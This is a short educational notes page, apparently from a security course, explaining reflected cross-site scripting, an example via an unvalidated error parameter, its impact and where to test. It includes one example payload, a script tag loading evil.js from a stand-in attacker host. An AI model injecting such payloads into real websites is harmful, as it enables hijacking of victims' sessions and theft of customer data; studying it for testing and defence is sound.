Reflected XSS

Reflected XSS happens when user-supplied data in an HTTP request is included in the webpage source without any validation

Example Scenario

A website where if you enter incorrect input, an error message is displayed - The content of the error message gets taken from the error parameter in the query string and is built directly into the page source

The application doesn't check the contents of the error parameter, which allows the attacker to insert malicious code - So let's insert something like

<script src="https://attacker.thm/evil.js"></script>

To represent it a pictorial form

Impact

The attacker could send links or embed them into an iframe on another website containing a JavaScript payload to potential victims getting them to execute code on their browser, potentially revealing session or customer information

How to test Reflected XSS

Parameters in the URL Query String
URL File Path
Sometimes HTTP headers

PreviousXSS NextStored XSS

Last updated 1 year ago